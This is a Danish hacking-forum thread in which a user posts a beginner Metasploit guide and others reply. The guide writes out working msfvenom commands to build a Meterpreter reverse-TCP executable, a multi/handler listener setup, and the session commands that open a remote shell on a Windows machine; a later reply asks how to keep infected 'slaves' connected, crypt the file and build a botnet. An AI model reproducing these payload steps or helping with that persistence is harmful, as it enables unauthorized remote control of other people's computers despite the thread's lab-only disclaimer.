Tråd bedømmelse:
  • 0 Stemmer - 0 Gennemsnit
  • 1
  • 2
  • 3
  • 4
  • 5
Metasploit Begynder guide [opnå adgang]
01-08-2013, 15:38 (Denne besked var sidst ændret: 02-08-2013, 09:50 af humle.)
#1
Rainbow  Metasploit Begynder guide [opnå adgang]
Jeg besluttede mig for, at lave en metasploit begynder guide. Der findes masser af dem der ude, så det er bestemt ikke noget nyt, vist du er velkendt med metasploit.

Men jeg synes at tråden mangler guides især danske, alt for meget snak alt for lidt guides. Jeg vil forsøge så vidt muligt at lave flere, når tid er (jeg har meget tid i øjeblikket og vil prøve at lave mindst 1 hver anden dag). Kom endelig med respons på eventuel mangler forbedringer også :)

# Attention læs dette inden påbegyndelse
Frasigelse: Denne guide har til formål at lære om sikkerhedshuller i Windows. Det er til en hver tid bedst praktisk at gøre det i et sikkert kontrolleret miljø. Husk det er ulovligt at hacke andre og svare til at sparke døren ind i en anden vedkommens lejlighed. - Brug guiden på eget ansvar og ikke mit. (så er det ude af verden hårde tider :))

Ting du har brug for, for at få det til at virke:
  1. Kali Linux vmware image Download eller Metasploit standalone Downlaod
  2. Windows ISO image Download (husk at updatere, slå firewall og antivirus fra denne guide er ikke inklusiv en AV bypasser)
  3. Vmware Download

Godt når du har det, er det vigtigt at din Kali er helt opdateret. Udføre derfor i terminalen:
  1. apt-get update
  2. apt-get upgrade
  3. apt-get dist-upgrade
  4. Det kan tage lidt tid, lav en god kop kaffe :)

Åben nu en 'Terminal' og indtast 'msfconsole' (det kan tag lidt tid at starte op)
Det skulle gerne se således ud:
  1. [Billede: show.php?id=56639]

Tag note af din IP adresse skriv den ned eller bare husk den.
Skriv i dit metasploit terminal vindue:
  1. ifconfig
  2. Køre du vmware, er det med største sandsynlighed eth0 som visser den.
  3. [Billede: show.php?id=56638]


Nu skal vi til at lave vores egen exe fil som vi kan afprøve i vores Windows OS. Til det forsætter vi i vores metasploit terminal vindue. Med nogen tilhørende metasploit værktøjer til formålet.
Skriv følgende
  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.8.135 LPORT=48653 -f exe > humle_beer.exe
  2. [Billede: show.php?id=56641]
  3. forklaring '-p' er vores PAYLOAD. 'LHOST' er din IP som lytter efter forbindelsen (den vi skulle huske). 'LPORT' er porten den lytter på. '-f' er vores format, i dette tilfælde en Windows exe. humle_beer.exe er vores exploit

Så langt så godt, er du kommet så langt med så klap dig selv på skulderen. Godt gået :)!
Nu har vi vores Windows OS klar og vores exploit som vi kan sende. Der kan man jo selv være lidt kreativ det gør ikke spor, du risikere kun at få en god idé ud af det.

Det vi blot mangler nu er at få vores metasploit til at lytte efter nogen som prøver at forbinde til os.
Så vi bevæger os tilbage til vores metasploit terminal vindue og skriver.
  1. use multi/handler
  2. set PAYLOAD windows/meterpreter/reverse_tcp
  3. set LHOST 172.16.8.135
  4. set LPORT 48653 (port 48653 staver humle :)
  5. set ExitOnSession false
  6. Tjek dine indstillinger med 'show options'
  7. [Billede: show.php?id=56642]
  8. Når alle vores indstillinger er sat, er vi klar til at køre vores "lytter"
  9. exploit -j ( 'exploit' starter vores lytter '-j' udføre det som et baggrund job)
  10. [Billede: show.php?id=56644]

I mens vi har arbejdet på at få det hele sat op håber jeg du har været kreativ :) (i vmware kan du bare trække og slippe din humle_beer.exe ind i din Windows OS) kør vores humle_beer.exe på vores Windows OS klient og hold så øje med, metasploit terminal vinduet.

Det skulle gerne se så ledes ud:

  1. [Billede: show.php?id=56645]
  2. Skriv følgende når din metasploit terminal har fået forbindelsen
  3. sessions
  4. sessions -i 1 ( '-i' står for at interagere med, efterfuldt af nummeret på sessionen)
  5. shell
  6. Nu har vi en shell direkte til vores Windows OS
  7. Det ok at blive lidt kreativ igen :)

FAQ:
  1. Nej jeg hedder ikke Henrik, brugeren er lavet til dette formål.
  2. Det en Windows 8 64bit, som Henrik var bruger på.
  3. Kan jeg komme forbi AV og Firewall på denne måde. Nej der skal lidt ekstra til, for at forbipassere det. Det er ikke formålet med guiden her.
  4. Hvordan kommer jeg forbi AV. Der kommer et link HER til den næste guide som forbipassere den.

Så der ikke meget andet at sige end stay safe, nu vil jeg ud og drikke en kold humle.
Kan du li guiden, så husk at bedømme den :)

./humle
Find alle beskeder fra denne bruger
Citer denne besked i et svar
01-08-2013, 18:54
#2
RE: Metasploit Begynder guide
Hehe, man kan nu også godt få mfsconsole, så der er ingen grund til at skaffe kali med det som ene formål :)
Fin guide, dine screenshots kunne godt skaleres lidt ned og stadig være læsbare, så egner den sig bedre til de med små skærme, men det er jo bare flueknepperi.
Glæder mig til at se de næste!
Mangler du hjælp?
Regler |  E-mail (PGP)
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
01-08-2013, 18:59
#3
RE: Metasploit Begynder guide
Fin guide..... Læste den lige 2 gang, og anden gang der læste jeg at du skriver at det er en begynder guide og det er det.
Der er sikkert flere nybegynder der ikke ved hvad det er du laver, altså hvad er mening med at lave det her?
Men ellers en super guide, du forkalr hvordan og hvorfor=+1 rep
There is 3 rules for a life.
1. fuck.
2. Dont give a fuck.
3. Dont be fucked over
Find alle beskeder fra denne bruger
Citer denne besked i et svar
01-08-2013, 19:26
#4
RE: Metasploit Begynder guide
(01-08-2013, 18:59)Lycia Skrev: Fin guide..... Læste den lige 2 gang, og anden gang der læste jeg at du skriver at det er en begynder guide og det er det.
Der er sikkert flere nybegynder der ikke ved hvad det er du laver, altså hvad er mening med at lave det her?
Men ellers en super guide, du forkalr hvordan og hvorfor=+1 rep

Man kan ikke servere alt på et sølvfad, så bliver den uforståelig og dårlig. Hvis du ikke ved hvad eth0 skal sige og hvad ifconfig gør, så er det ikke hans ansvar at forklare det, for det har ikke så meget med sagen at gøre. Det er jo ikke en Linux tutorial. Han forklarer de ting der er hacking relateret, og jeg synes han har fundet en god middelvej mellem fagligt og almentgyldigt sprog.
Mangler du hjælp?
Regler |  E-mail (PGP)
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
01-08-2013, 20:35
#5
RE: Metasploit Begynder guide
God begynder guide. Helt klart værd at læse for folk som gerne vil introduceres til Metasploit :)
Følg mig på twitter: https://twitter.com/Morph3s
Find alle beskeder fra denne bruger
Citer denne besked i et svar
02-08-2013, 07:30
#6
RE: Metasploit Begynder guide
Rigtig fin guide Humle, basic metaspoil skåret ud i pap. :)
Don't learn to hack, hack to learn
Find alle beskeder fra denne bruger
Citer denne besked i et svar
02-08-2013, 09:47
#7
RE: Metasploit Begynder guide
(01-08-2013, 18:54)Doctor Blue Skrev: Hehe, man kan nu også godt få mfsconsole, så der er ingen grund til at skaffe kali med det som ene formål :)
Fin guide, dine screenshots kunne godt skaleres lidt ned og stadig være læsbare, så egner den sig bedre til de med små skærme, men det er jo bare flueknepperi.
Glæder mig til at se de næste!

Jeg kan godt se de lidt store nu du nævner det :) .- Det tager jeg med mig til den næste guide.
Find alle beskeder fra denne bruger
Citer denne besked i et svar
17-11-2013, 01:42
#8
RE: Metasploit Begynder guide [opnå adgang]
God og simpel guide! Især for mig som stadig er en SKID :))
Er først ved at lære metasploit at kende, men fedt at kunne få en exe fil og arbejde med. Har kun rodet med Java_signed_applet indtil videre. Men er ved at fange konceptet.

Men er stadig blank på noget, hvis man vil have sine slaves til at forblive i meterpreter sessionen. Kan man så bruge en vpn/dns, også tilføje en startup command (ved fx at crypte filen) vil jeg så kunne se dem, hvis jeg selvfølge sætter LHOST til den samme ip/dns? Eller skal de fanges på en anden måde? evt et Botnet måske?
Og undskyld mine mange noob spørgsmål :)
Find alle beskeder fra denne bruger
Citer denne besked i et svar
« Ældre | Nyere »




User(s) browsing this thread: 1 Gæst(er)